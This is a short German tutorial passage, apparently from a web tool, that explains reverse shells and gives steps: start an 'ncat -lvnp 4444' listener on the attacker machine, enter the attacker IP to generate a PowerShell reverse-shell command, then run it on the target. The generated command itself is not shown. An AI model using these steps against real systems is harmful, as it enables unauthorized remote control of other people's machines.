Reverse Shells sind eine Methode, bei der die Eingabe und Ausgabe einer Shell an einen entfernten Dienst weitergeleitet wird. So kann man eine Shell remote kontrollieren.
Dieser Abschnitt demonstriert ein Beispiel dafür:
1. Stelle sicher, dass auf deinem Angreifer-Rechner netcat (oder ncat) vorhanden ist. Damit kannst du auf Port 4444 lauschen:
Netcat command:
ncat -lvnp 4444
2. Gib die IP des Angreifers (deine IP) in das folgende Feld ein und klicke auf "Generate PowerShell Command".
3. Den generierten PowerShell-Befehl auf das Zielsystem übertragen und ausführen.
PowerShell Reverse Shell Command: